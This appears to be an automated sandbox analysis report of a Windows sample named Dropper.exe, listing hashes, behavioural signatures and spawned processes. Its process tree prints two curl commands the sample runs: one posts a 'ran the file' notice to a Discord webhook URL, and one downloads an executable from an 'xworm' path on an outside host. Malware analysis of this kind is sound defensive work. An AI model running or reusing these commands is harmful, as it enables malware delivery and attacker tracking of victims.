Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
15-05-2024 09:25
General
-
Target
Dropper.exe
-
Size
130KB
-
MD5
f5506ffbf34168afb8dc1d12d08a38fc
-
SHA1
4062954622406a6e29c52d31dea192c79f7fe7bf
-
SHA256
018c780a107fe4c716e1f20814f821bee4571f2059b8efed53fafe31cea3d671
-
SHA512
e455aa92a43b0946945ee22d93b50ed9dcd7dc0c2f0e02132d4bcb1c0b67c90a132c7372f293c2292a925564cbc44050fa4830934aeb4422147905a2462716ed
-
SSDEEP
1536:K1KTRyrsnRpBgO7JL+97UCnDCZI31QocZaROflkfe970KqwGzlbP3BEA89wtHc:K1U4whj67KqH5bP8B
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
152KB